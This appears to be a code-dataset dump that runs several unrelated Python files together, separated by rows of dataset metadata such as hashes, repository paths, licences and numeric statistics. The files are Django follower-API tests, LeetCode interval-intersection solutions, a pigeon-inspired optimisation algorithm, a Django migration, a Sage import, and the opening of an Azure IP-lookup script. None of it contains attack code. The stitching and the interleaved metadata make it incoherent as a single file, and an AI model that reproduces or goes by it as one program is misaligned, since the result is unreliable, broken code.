self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 204, f"expected 204. got: {response.status_code}")
response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
dict_resp_data = json.loads(response.content)["data"]
self.assertEqual(len(dict_resp_data), 0, "follower list should have been empty but wasn't!")
response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author2.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
dict_resp_data = json.loads(response.content)["data"]
self.assertEqual(len(dict_resp_data), 1, f"expected list of length 1 but got {len(dict_resp_data)}")
def test_delete_follower_access_levels(self):
"""
should return 401 for anonymous users, 403 for non participant and followees, should return 200 for followers and admins
"""
password = "password"
user = User.objects.create_user("username1", password=password)
author: Author = Author.objects.get(userId=user)
user2 = User.objects.create_user("username2", password=password)
author2: Author = Author.objects.get(userId=user2)
self.client.login(username=user2.username, password=password)
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
self.client.logout()
# test anonymous user
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 401, f"expected 401. got: {response.status_code}")
# test non participant user
nonParticipant = User.objects.create_user("nonParticipant", password=password)
self.assertTrue(self.client.login(username=nonParticipant.username, password=password))
response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 403, f"expected 403. got: {response.status_code}")
# test followee
self.client.logout()
self.assertTrue(self.client.login(username=user.username, password=password))
response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 403, f"expected 403. got: {response.status_code}")
# test follower
self.client.logout()
self.assertTrue(self.client.login(username=user2.username, password=password))
response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 204, f"expected 204. got: {response.status_code}")
# have to replace for next delete call
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
# test admin
self.client.logout()
self.createAdmin()
response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 204, f"expected 204. got: {response.status_code}")
def test_delete_follower_nonexist(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
authorId = uuid4()
self.createAdmin()
self.auth_helper.get_author()
response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':authorId}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_delete_follower_bad_uuid(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
authorId = "notARealUUID"
self.createAdmin()
self.auth_helper.get_author()
response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':authorId}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_delete_follower_author_nonexist(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
authorId = uuid4()
self.createAdmin()
self.auth_helper.get_author()
response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':authorId, 'foreign_author_id':author.id}), format="json")
self.assertEqual(response.status_code, 404, f"expected 200. got: {response.status_code}")
def test_delete_follower_author_bad_uuid(self):
"""
should return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
authorId = "notARealUUID"
self.createAdmin()
self.auth_helper.get_author()
response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':authorId, 'foreign_author_id':author.id}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_delete_non_follower(self):
"""
sould return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
user2 = User.objects.create_user("username2")
author2: Author = Author.objects.get(userId=user2)
self.createAdmin()
self.auth_helper.get_author()
response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
def test_delete_follower_twice(self):
"""
should succesfully remove the follower, then return 404
"""
user = User.objects.create_user("username1")
author: Author = Author.objects.get(userId=user)
user2 = User.objects.create_user("username2")
author2: Author = Author.objects.get(userId=user2)
self.createAdmin()
self.auth_helper.get_author()
response = self.client.put(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 204, f"expected 204. got: {response.status_code}")
response = self.client.get(reverse('author:author-followers', kwargs={'author_id':author.id}))
self.assertEqual(response.status_code, 200, f"expected 200. got: {response.status_code}")
dict_resp_data = json.loads(response.content)["data"]
self.assertEqual(len(dict_resp_data), 0, "follower list should have been empty but wasn't!")
response = self.client.delete(reverse('author:follower-info', kwargs={'author_id':author.id, 'foreign_author_id':author2.id}), format="json")
self.assertEqual(response.status_code, 404, f"expected 404. got: {response.status_code}")
| 45.05638
| 149
| 0.643638
| 5,307
| 45,552
| 5.410025
| 0.041078
| 0.052384
| 0.094041
| 0.075755
| 0.928425
| 0.917732
| 0.910557
| 0.903939
| 0.900944
| 0.888928
| 0
| 0.021858
| 0.212592
| 45,552
| 1,011
| 150
| 45.05638
| 0.778605
| 0.041711
| 0
| 0.827532
| 0
| 0
| 0.286523
| 0.04637
| 0
| 0
| 0
| 0
| 0.25
| 1
| 0.063291
| false
| 0.05538
| 0.011076
| 0
| 0.075949
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
|
0
| 8
|
5391c982cb4192ad40fe2c2b0ace82166ac9f4b7
| 1,119
|
py
|
Python
|
0901-1000/0986-Interval List Intersections/0986-Interval List Intersections.py
|
jiadaizhao/LeetCode
|
4ddea0a532fe7c5d053ffbd6870174ec99fc2d60
|
[
"MIT"
] | 49
|
2018-05-05T02:53:10.000Z
|
2022-03-30T12:08:09.000Z
|
0901-1000/0986-Interval List Intersections/0986-Interval List Intersections.py
|
jolly-fellow/LeetCode
|
ab20b3ec137ed05fad1edda1c30db04ab355486f
|
[
"MIT"
] | 11
|
2017-12-15T22:31:44.000Z
|
2020-10-02T12:42:49.000Z
|
0901-1000/0986-Interval List Intersections/0986-Interval List Intersections.py
|
jolly-fellow/LeetCode
|
ab20b3ec137ed05fad1edda1c30db04ab355486f
|
[
"MIT"
] | 28
|
2017-12-05T10:56:51.000Z
|
2022-01-26T18:18:27.000Z
|
class Solution:
def intervalIntersection(self, A: List[List[int]], B: List[List[int]]) -> List[List[int]]:
result = []
i = j = 0
while i < len(A) and j < len(B):
if A[i][1] < B[j][0]:
i += 1
elif B[j][1] < A[i][0]:
j += 1
else:
start = max(A[i][0], B[j][0])
end = min(A[i][1], B[j][1])
result.append([start, end])
if A[i][1] <= B[j][1]:
i += 1
else:
j += 1
return result
class Solution2:
def intervalIntersection(self, A: List[List[int]], B: List[List[int]]) -> List[List[int]]:
result = []
i = j = 0
while i < len(A) and j < len(B):
start = max(A[i][0], B[j][0])
end = min(A[i][1], B[j][1])
if start <= end:
result.append([start, end])
if A[i][1] <= B[j][1]:
i += 1
else:
j += 1
return result
| 29.447368
| 94
| 0.347632
| 146
| 1,119
| 2.664384
| 0.184932
| 0.041131
| 0.169666
| 0.051414
| 0.856041
| 0.856041
| 0.838046
| 0.838046
| 0.838046
| 0.838046
| 0
| 0.043328
| 0.484361
| 1,119
| 38
| 95
| 29.447368
| 0.630849
| 0
| 0
| 0.84375
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.0625
| false
| 0
| 0
| 0
| 0.1875
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53c67ddc4d522fcc2aa592daeb46c15301b5636a
| 7,276
|
py
|
Python
|
mealpy/dummy/PIO.py
|
JokerHB/mealpy
|
4bd00f47ed575d01f246d5fd0ef306d7c1fa5a5f
|
[
"MIT"
] | 162
|
2020-08-31T10:13:06.000Z
|
2022-03-31T09:38:19.000Z
|
mealpy/dummy/PIO.py
|
JokerHB/mealpy
|
4bd00f47ed575d01f246d5fd0ef306d7c1fa5a5f
|
[
"MIT"
] | 51
|
2020-09-13T10:46:31.000Z
|
2022-03-30T06:12:08.000Z
|
mealpy/dummy/PIO.py
|
JokerHB/mealpy
|
4bd00f47ed575d01f246d5fd0ef306d7c1fa5a5f
|
[
"MIT"
] | 58
|
2020-09-12T13:29:18.000Z
|
2022-03-31T09:38:21.000Z
|
#!/usr/bin/env python
# ------------------------------------------------------------------------------------------------------%
# Created by "Thieu Nguyen" at 11:41, 08/04/2020 %
# %
# Email: nguyenthieu2102@gmail.com %
# Homepage: https://www.researchgate.net/profile/Thieu_Nguyen6 %
# Github: https://github.com/thieu1995 %
#-------------------------------------------------------------------------------------------------------%
from numpy.random import uniform
from numpy import exp, sum
from mealpy.optimizer import Root
class BasePIO(Root):
"""
My improved version of: Pigeon-Inspired Optimization (PIO)
(Pigeon-inspired optimization: a new swarm intelligence optimizer for air robot path planning)
Link:
+ DOI: 10.1108/IJICC-02-2014-0005
Noted:
+ The paper is very unclear most the parameters and the flow of algorithm (some points even wrong)
+ This is my version, I changed almost everything, even parameters and flow of algorithm
+ Also the personal best no need in this version (So it is now much different than PSO)
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100, R=0.2, n_switch=0.75, **kwargs):
super().__init__(obj_func, lb, ub, verbose, kwargs)
self.epoch = epoch # Nc1 + Nc2
self.pop_size = pop_size # Np
self.R = R
if n_switch < 1:
self.n_switch = int(self.epoch * n_switch)
else:
self.n_switch = int(n_switch) # Represent Nc1 and Nc2 in the paper
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB)
list_velocity = uniform(self.lb, self.ub, (self.pop_size, self.problem_size))
n_p = int(self.pop_size / 2)
for epoch in range(0, self.epoch):
if epoch < self.n_switch: # Map and compass operations
for i in range(0, self.pop_size):
v_new = list_velocity[i] * exp(-self.R * (epoch + 1)) + uniform() * (g_best[self.ID_POS] - pop[i][self.ID_POS])
x_new = pop[i][self.ID_POS] + v_new
x_new = self.amend_position_random(x_new)
fit = self.get_fitness_position(x_new)
if fit < pop[i][self.ID_FIT]:
pop[i] = [x_new, fit]
list_velocity[i] = v_new
else: # Landmark operations
pop = sorted(pop, key=lambda item: item[self.ID_FIT])
list_fit = [pop[i][self.ID_FIT] for i in range(0, n_p)]
list_pos = [pop[i][self.ID_FIT] for i in range(0, n_p)]
frac_up = sum([list_fit[i] * list_pos[i] for i in range(0, n_p)], axis=0)
frac_down = n_p * sum(list_fit)
x_c = frac_up / frac_down
## Move all pigeon based on target x_c
for i in range(0, self.pop_size):
x_new = pop[i][self.ID_POS] + uniform() * (x_c - pop[i][self.ID_POS])
fit_new = self.get_fitness_position(x_new)
if fit_new < pop[i][self.ID_FIT]:
pop[i] = [x_new, fit_new]
# Update the global best
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
class LevyPIO(BasePIO):
"""
My levy version of: Pigeon-Inspired Optimization (PIO)
(Pigeon-inspired optimization: a new swarm intelligence optimizer for air robot path planning)
Noted:
+ The paper is very unclear most the parameters and the flow of algorithm (some points even wrong)
+ This is my version, I changed almost everything, even parameters and flow of algorithm
+ Also the personal best no need in this version (So it is now much different than PSO)
+ I applied the levy-flight here for more robust
"""
def __init__(self, obj_func=None, lb=None, ub=None, verbose=True, epoch=750, pop_size=100, R=0.2, n_switch=0.75, **kwargs):
BasePIO.__init__(self, obj_func, lb, ub, verbose, epoch, pop_size, R, n_switch, kwargs = kwargs)
def train(self):
pop = [self.create_solution() for _ in range(self.pop_size)]
g_best = self.get_global_best_solution(pop=pop, id_fit=self.ID_FIT, id_best=self.ID_MIN_PROB)
list_velocity = uniform(self.lb, self.ub, (self.pop_size, self.problem_size))
n_p = int(self.pop_size / 2)
for epoch in range(0, self.epoch):
if epoch < self.n_switch: # Map and compass operations
for i in range(0, self.pop_size):
v_new = list_velocity[i] * exp(-self.R * (epoch + 1)) + uniform() * (g_best[self.ID_POS] - pop[i][self.ID_POS])
x_new = pop[i][self.ID_POS] + v_new
x_new = self.amend_position_random(x_new)
fit_new = self.get_fitness_position(x_new)
if fit_new < pop[i][self.ID_FIT]:
pop[i] = [x_new, fit_new]
list_velocity[i] = v_new
else: # Landmark operations
pop = sorted(pop, key=lambda item: item[self.ID_FIT])
list_fit = [pop[i][self.ID_FIT] for i in range(0, n_p)]
list_pos = [pop[i][self.ID_FIT] for i in range(0, n_p)]
frac_up = sum([list_fit[i] * list_pos[i] for i in range(0, n_p)], axis=0)
frac_down = n_p * sum(list_fit)
x_c = frac_up / frac_down
## Move all pigeon based on target x_c
for i in range(0, self.pop_size):
if uniform() < 0.5:
x_new = pop[i][self.ID_POS] + uniform() * (x_c - pop[i][self.ID_POS])
else:
x_new = self.levy_flight(epoch, pop[i][self.ID_POS], g_best[self.ID_POS])
fit_new = self.get_fitness_position(x_new)
if fit_new < pop[i][self.ID_FIT]:
pop[i] = [x_new, fit_new]
# Update the global best
g_best = self.update_global_best_solution(pop, self.ID_MIN_PROB, g_best)
self.loss_train.append(g_best[self.ID_FIT])
if self.verbose:
print(">Epoch: {}, Best fit: {}".format(epoch + 1, g_best[self.ID_FIT]))
self.solution = g_best
return g_best[self.ID_POS], g_best[self.ID_FIT], self.loss_train
| 53.5
| 131
| 0.529962
| 995
| 7,276
| 3.658291
| 0.18191
| 0.059341
| 0.044505
| 0.046703
| 0.837912
| 0.826923
| 0.826923
| 0.823077
| 0.81456
| 0.81456
| 0
| 0.017935
| 0.340984
| 7,276
| 135
| 132
| 53.896296
| 0.741189
| 0.275838
| 0
| 0.788235
| 0
| 0
| 0.009401
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0.047059
| false
| 0
| 0.035294
| 0
| 0.129412
| 0.023529
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 7
|
53c9df34d09605adaba61ff0e972cf1d141b4fda
| 10,756
|
py
|
Python
|
web/transiq/fms/migrations/0012_auto_20180607_1746.py
|
manibhushan05/transiq
|
763fafb271ce07d13ac8ce575f2fee653cf39343
|
[
"Apache-2.0"
] | null | null | null |
web/transiq/fms/migrations/0012_auto_20180607_1746.py
|
manibhushan05/transiq
|
763fafb271ce07d13ac8ce575f2fee653cf39343
|
[
"Apache-2.0"
] | 14
|
2020-06-05T23:06:45.000Z
|
2022-03-12T00:00:18.000Z
|
web/transiq/fms/migrations/0012_auto_20180607_1746.py
|
manibhushan05/transiq
|
763fafb271ce07d13ac8ce575f2fee653cf39343
|
[
"Apache-2.0"
] | null | null | null |
# Generated by Django 2.0.5 on 2018-06-07 17:46
from django.conf import settings
from django.db import migrations, models
import django.db.models.deletion
class Migration(migrations.Migration):
dependencies = [
('supplier', '0023_auto_20180519_0041'),
migrations.swappable_dependency(settings.AUTH_USER_MODEL),
('fms', '0011_mobileappversions_upgrade_type'),
]
operations = [
migrations.CreateModel(
name='HistoricalQuoteVehicles',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('vehicle_no', models.CharField(max_length=20)),
('status', models.CharField(blank=True, max_length=15, null=True)),
('created_on', models.DateTimeField(blank=True, editable=False)),
('updated_on', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('deleted_on', models.DateTimeField(blank=True, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('changed_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical quote vehicles',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalRequirementQuote',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('rate', models.CharField(max_length=15, null=True)),
('date', models.DateField(blank=True, null=True)),
('status', models.CharField(blank=True, max_length=15, null=True)),
('created_on', models.DateTimeField(blank=True, editable=False)),
('updated_on', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('deleted_on', models.DateTimeField(blank=True, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('changed_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical requirement quote',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='HistoricalRequirementVehicleQuote',
fields=[
('id', models.IntegerField(auto_created=True, blank=True, db_index=True, verbose_name='ID')),
('created_on', models.DateTimeField(blank=True, editable=False)),
('updated_on', models.DateTimeField(blank=True, editable=False)),
('deleted', models.BooleanField(default=False)),
('deleted_on', models.DateTimeField(blank=True, null=True)),
('history_id', models.AutoField(primary_key=True, serialize=False)),
('history_date', models.DateTimeField()),
('history_change_reason', models.CharField(max_length=100, null=True)),
('history_type', models.CharField(choices=[('+', 'Created'), ('~', 'Changed'), ('-', 'Deleted')], max_length=1)),
('changed_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to=settings.AUTH_USER_MODEL)),
('history_user', models.ForeignKey(null=True, on_delete=django.db.models.deletion.SET_NULL, related_name='+', to=settings.AUTH_USER_MODEL)),
],
options={
'verbose_name': 'historical requirement vehicle quote',
'ordering': ('-history_date', '-history_id'),
'get_latest_by': 'history_date',
},
),
migrations.CreateModel(
name='QuoteVehicles',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('vehicle_no', models.CharField(max_length=20)),
('status', models.CharField(blank=True, max_length=15, null=True)),
('created_on', models.DateTimeField(auto_now_add=True)),
('updated_on', models.DateTimeField(auto_now=True)),
('deleted', models.BooleanField(default=False)),
('deleted_on', models.DateTimeField(blank=True, null=True)),
('changed_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='vehicle_quote_created_by', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='RequirementQuote',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('rate', models.CharField(max_length=15, null=True)),
('date', models.DateField(blank=True, null=True)),
('status', models.CharField(blank=True, max_length=15, null=True)),
('created_on', models.DateTimeField(auto_now_add=True)),
('updated_on', models.DateTimeField(auto_now=True)),
('deleted', models.BooleanField(default=False)),
('deleted_on', models.DateTimeField(blank=True, null=True)),
('changed_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='requirement_quote_created_by', to=settings.AUTH_USER_MODEL)),
],
),
migrations.CreateModel(
name='RequirementVehicleQuote',
fields=[
('id', models.AutoField(auto_created=True, primary_key=True, serialize=False, verbose_name='ID')),
('created_on', models.DateTimeField(auto_now_add=True)),
('updated_on', models.DateTimeField(auto_now=True)),
('deleted', models.BooleanField(default=False)),
('deleted_on', models.DateTimeField(blank=True, null=True)),
('changed_by', models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, to=settings.AUTH_USER_MODEL)),
('created_by', models.ForeignKey(null=True, on_delete=django.db.models.deletion.CASCADE, related_name='requirement_vehicle_quote_created_by', to=settings.AUTH_USER_MODEL)),
('quote_vehicle', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='requirement_vehicle_quote', to='fms.QuoteVehicles')),
('requirement', models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='requirement_quote', to='fms.Requirement')),
],
),
migrations.AddField(
model_name='requirementquote',
name='requirement_vehicle_quote',
field=models.ForeignKey(blank=True, null=True, on_delete=django.db.models.deletion.CASCADE, related_name='requirement_quote', to='fms.RequirementVehicleQuote'),
),
migrations.AddField(
model_name='requirementquote',
name='supplier',
field=models.ForeignKey(on_delete=django.db.models.deletion.CASCADE, related_name='supplier_quote', to='supplier.Supplier'),
),
migrations.AddField(
model_name='historicalrequirementvehiclequote',
name='quote_vehicle',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='fms.QuoteVehicles'),
),
migrations.AddField(
model_name='historicalrequirementvehiclequote',
name='requirement',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='fms.Requirement'),
),
migrations.AddField(
model_name='historicalrequirementquote',
name='requirement_vehicle_quote',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='fms.RequirementVehicleQuote'),
),
migrations.AddField(
model_name='historicalrequirementquote',
name='supplier',
field=models.ForeignKey(blank=True, db_constraint=False, null=True, on_delete=django.db.models.deletion.DO_NOTHING, related_name='+', to='supplier.Supplier'),
),
]
| 66.395062
| 189
| 0.63174
| 1,136
| 10,756
| 5.766725
| 0.09331
| 0.045184
| 0.05129
| 0.080598
| 0.909174
| 0.905969
| 0.872386
| 0.84552
| 0.84552
| 0.83056
| 0
| 0.007547
| 0.223875
| 10,756
| 161
| 190
| 66.807453
| 0.777192
| 0.004184
| 0
| 0.767742
| 1
| 0
| 0.166962
| 0.052386
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| false
| 0
| 0.019355
| 0
| 0.03871
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 1
| 1
| 1
| 1
| 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 1
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
|
0
| 8
|
990657e143b4f7c96515211fc09f2025c8718be9
| 98
|
py
|
Python
|
src/sage/manifolds/all.py
|
fredstro/sage
|
c936d2cda81ec7ec3552a3bdb29c994b40d1bb24
|
[
"BSL-1.0"
] | null | null | null |
src/sage/manifolds/all.py
|
fredstro/sage
|
c936d2cda81ec7ec3552a3bdb29c994b40d1bb24
|
[
"BSL-1.0"
] | null | null | null |
src/sage/manifolds/all.py
|
fredstro/sage
|
c936d2cda81ec7ec3552a3bdb29c994b40d1bb24
|
[
"BSL-1.0"
] | null | null | null |
from sage.misc.lazy_import import lazy_import
lazy_import('sage.manifolds.manifold', 'Manifold')
| 24.5
| 50
| 0.816327
| 14
| 98
| 5.5
| 0.5
| 0.38961
| 0.415584
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0.071429
| 98
| 3
| 51
| 32.666667
| 0.846154
| 0
| 0
| 0
| 0
| 0
| 0.319588
| 0.237113
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| true
| 0
| 1
| 0
| 1
| 0
| 1
| 0
| 0
| null | 1
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| 0
| null | 0
| 0
| 0
| 0
| 0
| 0
| 1
| 0
| 1
| 0
| 1
| 0
|
0
| 7
|
99099e1fca63771eb747518e9af35682d3e26888
| 53,364
|
py
|
Python
|
grab_vars.py
|
Yaredt/f5-azure-saca
|
a3d788576b491540ae2f90541df78dcf5339ce89
|
[
"MIT"
] | null | null | null |
grab_vars.py
|
Yaredt/f5-azure-saca
|
a3d788576b491540ae2f90541df78dcf5339ce89
|
[
"MIT"
] | 1
|
2019-03-29T11:52:48.000Z
|
2019-03-29T11:52:48.000Z
|
grab_vars.py
|
Yaredt/f5-azure-saca
|
a3d788576b491540ae2f90541df78dcf5339ce89
|
[
"MIT"
] | 1
|
2019-03-29T11:50:18.000Z
|
2019-03-29T11:50:18.000Z
|
#!/usr/bin/env python
from azure.common.credentials import ServicePrincipalCredentials
from azure.mgmt.resource import ResourceManagementClient
from azure.mgmt.network import NetworkManagementClient
from azure.mgmt.compute import ComputeManagementClient
from azure.mgmt.resource.resources.models import DeploymentMode
from msrestazure.azure_cloud import AZURE_US_GOV_CLOUD
from msrestazure.azure_cloud import AZURE_PUBLIC_CLOUD
import os
if os.environ.get("is_gov") == "1":
mycloud = AZURE_US_GOV_CLOUD
else:
mycloud = AZURE_PUBLIC_CLOUD
from optparse import OptionParser
parser = OptionParser()
parser.add_option('--action',help="external|internal|complete")
parser.add_option('--debug',action="store_true")
parser.add_option('--private',action="store_true")
(options, args) = parser.parse_args()
import os
import pprint
import re
import sys
import json
import time
from netaddr import IPNetwork, IPAddress
USE_OMS = os.environ.get('use_oms','False') == 'True'
if os.path.exists('.use_oms'):
USE_OMS=True
if USE_OMS:
LOG_PROFILE="OMS.app/OMS_remote_logging"
from azure.mgmt.loganalytics import LogAnalyticsManagementClient
else:
LOG_PROFILE="local-afm-log"
def get_ips(resource_group, instanceName):
vm = compute_client.virtual_machines.get(resource_group,instanceName , expand='instanceview')
vm_nic = vm.network_profile.network_interfaces[0].id.split('/')[-1]
vm_ip = IPAddress(network_client.network_interfaces.get(resource_group,vm_nic).ip_configurations[0].private_ip_address)
if network_client.network_interfaces.get(resource_group,vm_nic).ip_configurations[0].public_ip_address:
pip_name = network_client.network_interfaces.get(resource_group,vm_nic).ip_configurations[0].public_ip_address.id.split('/')[-1]
pip = network_client.public_ip_addresses.get(resource_group,pip_name)
if pip.dns_settings:
return (vm_ip, IPAddress(pip.ip_address), pip.dns_settings.fqdn)
else:
return (vm_ip, IPAddress(pip.ip_address), None)
else:
return (vm_ip, None, None)
def get_ext_ips(resource_group, instanceName):
vm = compute_client.virtual_machines.get(resource_group,instanceName , expand='instanceview')
vm_nic = vm.network_profile.network_interfaces[1].id.split('/')[-1]
vm_ip = IPAddress(network_client.network_interfaces.get(resource_group,vm_nic).ip_configurations[0].private_ip_address)
if network_client.network_interfaces.get(resource_group,vm_nic).ip_configurations[0].public_ip_address:
pip_name = network_client.network_interfaces.get(resource_group,vm_nic).ip_configurations[0].public_ip_address.id.split('/')[-1]
pip = network_client.public_ip_addresses.get(resource_group,pip_name)
return (vm_ip, IPAddress(pip.ip_address))
else:
return (vm_ip, None)
#def enable_ip_forward(resource_group, instanceName):
def get_pip(resource_group, pip_name):
pip = network_client.public_ip_addresses.get(resource_group,pip_name)
if pip.dns_settings:
return (IPAddress(pip.ip_address), pip.dns_settings.fqdn)
else:
return (IPAddress(pip.ip_address), None)
subnet_re=re.compile('/\d\d?$')
ipaddr_re=re.compile('\d+\.\d+\.\d+\.\d+')
